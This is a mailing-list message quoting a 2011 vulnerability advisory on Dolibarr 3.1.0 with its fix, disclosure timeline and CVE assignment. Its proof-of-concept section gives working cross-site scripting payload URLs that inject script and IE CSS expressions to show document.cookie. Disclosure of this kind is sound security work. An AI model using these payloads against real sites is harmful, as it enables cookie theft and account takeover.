On Wed, Nov 09, 2011 at 09:59:18AM +0000, security@xxxxxxxxxxxx wrote: > Advisory: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0 > Advisory ID: INFOSERVE-ADV2011-03 > Author: Stefan Schurtz > Contact: security@xxxxxxxxxxxx > Affected Software: Successfully tested on Dolibarr 3.1.0 other versions may also be affected > Vendor URL: http://www.dolibarr.org/ > Vendor Status: fixed in the 3.1 branch > > ========================== > Vulnerability Description > ========================== > > Dolibarr 3.1.0 is prone to multiple XSS vulnerability > > ================== > PoC-Exploit > ================== > > Cross-Site-Scripting - parameter 'username' > > http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script> > http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>&=3&optioncss=print > > IE-only > > http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie)) > http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie)) > http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie)) > > ========= > Solution: > ========= > > Fixed in the 3.1 branch > > ==================== > Disclosure Timeline: > ==================== > > 08-Nov-2011 - vendor informed > 09-Nov-2011 - vendor fix in the 3.1 branch > > ======== > Credits: > ======== > > Vulnerabilities found and advisory written by INFOSERVE Security Team > > =========== > References: > =========== > > https://doliforge.org/tracker/?func=detail&aid=232&group_id=144 > https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4207e78a1 > http://www.dolibarr.org/ > http://www.infoserve.de/ CVE-2011-4329 is assigned for this issue. Best regards, Henri Salo
